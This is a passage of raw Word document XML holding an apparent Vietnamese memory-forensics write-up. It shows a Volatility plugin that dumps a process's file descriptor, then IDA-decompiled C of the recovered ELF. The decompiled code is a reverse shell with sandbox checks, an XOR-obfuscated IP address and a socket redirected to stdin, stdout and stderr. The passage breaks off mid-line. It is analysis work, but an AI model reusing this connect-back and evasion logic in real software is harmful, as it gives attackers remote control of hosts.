      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>pslist.linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>pslist._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_init_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>self, config, *args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F363A" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C"/>
    <w:p w14:paraId="7B801F04" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">        config.add_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>option(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D32D562" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">            "FD",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22311766" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">            default=None,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B7534" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">            type="int"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC1ADD" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F7B5B" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C"/>
    <w:p w14:paraId="637C418D" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">    def calculate(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBA2DA" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">        for task in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>pslist.linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>pslist.calculate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD35CDC" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">            for filp, fd in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>task.lsof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E51B0" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                if int(fd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>) !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>self._config.FD</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B0D11C" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                    continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5308E6" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C"/>
    <w:p w14:paraId="4F891E58" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                inode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>filp.dentry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>.d_inode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DF80C" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C"/>
    <w:p w14:paraId="6201DBA5" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>open(self._config.outfile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>, "wb") as output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C54295F" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                    for page in self.get_file_contents(inode):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C418F3" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>output.write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>(page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FDEA6F" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C"/>
    <w:p w14:paraId="2C177B18" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                yield task.pid, fd, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>inode.i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA083C" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C"/>
    <w:p w14:paraId="167AA856" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">    def render_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>text(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>self, outfd, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A98AA1B" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">        for pid, fd, size in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC2B6DC" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>outfd.write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EDE2E0" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "PID</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>0} FD</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>1} SIZE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>={2}\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>".format</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A6154C">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2573C1" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                    pid, fd, size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD69EC9" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">                )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D965F89" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDBCE6E" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t>PY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B1670" w14:textId="77777777" w:rsidR="00A6154C" w:rsidRPr="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t xml:space="preserve">vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_dump_fd -p 1451 --fd 4 -O recover/fd4.bin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D34DAC" w14:textId="34D9156E" w:rsidR="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0717DCE1" wp14:editId="79E98F28">
            <wp:extent cx="5943600" cy="2423160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86485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9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4338" w14:textId="5F904047" w:rsidR="00A6154C" w:rsidRDefault="00A6154C" w:rsidP="00A6154C">
      <w:r w:rsidRPr="00A6154C">
        <w:t>Vậy fd4.bin là một file thực thi ELF 64-bit dạng PIE, đã bị stripped. Tiếp tục sử dụng IDA để decompile</w:t>
      </w:r>
      <w:r w:rsidR="007C5184">
        <w:t xml:space="preserve">. Check ngay hàm main đầu tiên </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0362F73F" w14:textId="467A1ECE" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="00A6154C">
      <w:r w:rsidRPr="007C5184">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FC9588" wp14:editId="429C0494">
            <wp:extent cx="5943600" cy="2749550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20629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27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7950" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">__int64 __fastcall </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>int a1, char **a2, char **a3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FDABC" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7550E" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  __int64 v3; // rbx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7286F68A" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  size_t v4; // rbx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD0119" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  size_t v5; // rbx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0FE464" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  char s1[48]; // [rsp+0h] [rbp-A0h] BYREF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B98EAC" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>buf[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>48]; // [rsp+30h] [rbp-70h] BYREF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A314C1" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  struct sockaddr addr; // [rsp+60h] [rbp-40h] BYREF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526019C3" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>s[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>13]; // [rsp+73h] [rbp-2Dh] BYREF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC92C2D" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  int fd; // [rsp+80h] [rbp-20h]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0881F" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  int j; // [rsp+84h] [rbp-1Ch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3262FBEF" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  int i; // [rsp+88h] [rbp-18h]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A67BE3E" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  int v14; // [rsp+8Ch] [rbp-14h]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA0FC4" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184"/>
    <w:p w14:paraId="4C3B915E" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, "(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1(+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1.&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'1*-");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2444A1B6" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  v14 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FC7F6E" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  v3 = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sysconf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>85) / 1024;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1A7A2" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3 * (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sysconf(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">30) / 1024) &lt;= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>999 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3678B151" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    ++v14;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37447F" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( sysconf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">(84) &lt;= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="164B8E56" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    ++v14;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA036AE" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>unsigned __int</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>64)sub</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_11F5(84, a2) &lt;= 0x3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>C )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C5EAF50" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    ++v14;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577884E0" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">14 &gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2 )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="458E661B" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F006C2" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>; ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ++</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D3FF7FF" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A19E255" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    v4 = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0CA88D" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>4 &gt;= strlen(s</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>) )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="06AB029E" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">      break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69900F42" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">    s[i] ^= 0x1Fu;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A64917" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444EE9B2" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  fd = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>socket(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2, 1, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268328C" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  addr.sa_family = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267F962" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  *(_WORD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>*)addr.sa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_data = htons(0x115Cu);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6D3E2" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  *(_DWORD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>*)&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>addr.sa_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2] = inet_addr(s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B502F" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>connect(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>fd, &amp;addr, 0x10u);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588FCEB3" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  dup2(fd, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF988A4" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  dup2(fd, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FBB1D4" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  dup2(fd, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1D8F9" w14:textId="77777777" w:rsidR="007C5184" w:rsidRDefault="007C5184" w:rsidP="007C5184">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>strcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>s1, "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>WK]d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
